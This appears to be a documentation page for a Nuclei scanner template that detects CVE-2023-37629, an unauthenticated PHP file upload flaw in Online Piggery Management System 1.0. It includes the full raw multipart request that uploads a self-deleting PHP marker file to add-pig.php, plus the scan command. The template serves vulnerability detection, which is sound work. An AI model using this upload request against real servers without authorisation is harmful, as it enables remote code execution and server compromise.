Online Piggery Management System v1.0 - Unauthenticated File Upload
ID: CVE-2023-37629
Severity: critical
Author: Harsh
Tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
Description
Section titled “Description”Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
YAML Source
Section titled “YAML Source”id: CVE-2023-37629
info: name: Online Piggery Management System v1.0 - Unauthenticated File Upload author: Harsh severity: critical description: | Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php. impact: | Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server. reference: - https://www.exploit-db.com/exploits/51598 - https://nvd.nist.gov/vuln/detail/CVE-2023-37629 - https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html - https://github.com/1337kid/Piggery_CMS_multiple_vulns_PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37629 cwe-id: CWE-434 epss-score: 0.09817 epss-percentile: 0.94811 cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: simple_online_piggery_management_system_project product: simple_online_piggery_management_system tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_projectvariables: string: "CVE-2023-37629"
http: - raw: - | POST /pig/add-pig.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="pigno"
pig-fms-100 -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="weight"
65465 -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="arrived"
{{date_time("%Y-%M-%D")}} -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="gender"
female -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="status"
active -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="breed"
2 -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="remark"
4fwefwe -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php" Content-Type: application/x-php
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="submit"
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--
matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(content_type, "text/html")' - 'contains(body, "successfully created")' condition: and# digest: 4a0a0047304502210095a974aef825c5e633e83e3090561bf9633331e62fd095621a2c5140d828f51002203875f8ab67b31f75eb327e7f0093f3aa01581825d9ff1ac45a71f66cf9655e15:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-37629.yaml"